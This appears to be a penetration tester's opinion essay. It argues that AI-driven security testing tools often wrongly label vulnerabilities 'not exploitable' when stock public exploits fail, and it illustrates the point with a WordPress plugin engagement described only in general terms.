There's a risk building quietly in the security industry, and it's not what most people expect.
It's not that AI-driven testing tools miss vulnerabilities. They're actually quite good at finding them... often faster than a human ever would. The problem is what happens after the finding.
An AI agent identifies a vulnerability. It pulls down the public PoC. It fires the default payloads, walks the known paths, tries the documented attack chain. And when those don't land, it draws a conclusion: not exploitable in this environment.
That conclusion can be dead wrong.
On a recent engagement, two high-severity WordPress plugin vulnerabilities came up:
Chained together, these give you unauthenticated remote code execution. The CVSS reflects it. Any scanner or automated agent would flag them immediately, and they did.
But the public exploit code didn't work.
Paths were wrong. Server behaviour didn't match what the PoC author had in front of them when they wrote it. Execution was unreliable. The environment just wasn't cooperating with the assumptions baked into the published chain.
This is the point where automation tends to hit a wall.
The agent tries the known chain. It fails. There's no creative leap that says "what if path resolution works differently here?" or "what if I pull config data through the file read first and rebuild the approach from what I find?"
It just moves on.
And what ends up in the report is something along the lines of:
High severity vulnerability identified. Not exploitable in this environment.
That's not validation. That's assumption dressed up as assurance.
Getting from "known CVE" to a working compromise on this engagement wasn't a matter of clicking run. It took:
The published exploit was a starting point. Nothing more.
Eventually the chain came together. Controlled command execution landed. A persistent shell followed. And the scope of the conversation shifted entirely, from a vulnerable plugin to full server compromise and lateral risk.
Missing a vulnerability is bad. Misclassifying one is worse.
The scenario that keeps me up at night is this: an automated tool finds a critical issue, tries the stock exploit, fails because of some environmental quirk, and then confidently tells the client it can't be exploited.
To a decision-maker reading that report, the message is clear:
Yes, the vulnerability exists. Yes, it's rated critical. But it doesn't actually work here. Move on.
Except it does work. It just needed more effort than a templated attack chain.
That gap... between "didn't work automatically" and "not exploitable" is where real risk lives. It produces a clean looking report while the exposure underneath remains completely unaddressed.
AI is good at scale. It's good at coverage. It's very good at flagging known issues across large environments quickly.
But real world exploitation rarely lives in clean, documented territory. It sits in the grey area between a published vulnerability, an environment that doesn't quite match, partial success with a known technique, and the manual adaptation needed to close the gap.
That space still belongs to human testers. Because exploitation isn't about running a script as-published it's about understanding the intent behind the technique, reshaping it to fit what's actually in front of you, and persisting through the parts that don't work on the first pass.
That kind of thinking is hard to template.
AI driven testing has a legitimate place. It widens visibility and accelerates discovery in ways that are genuinely useful.
But when it becomes a replacement for human-led penetration testing rather than a complement, the risk isn't just missed findings. It's misplaced confidence.
A report that says "not exploitable" carries weight. It influences remediation priorities. It can push a critical fix to the back of the queue. It shapes how organisations think about their exposure.
If that judgement is built on nothing more than whether a stock exploit ran successfully, it's not a finding. It's a guess.
And in the wrong environment, that guess is exactly what an attacker is counting on.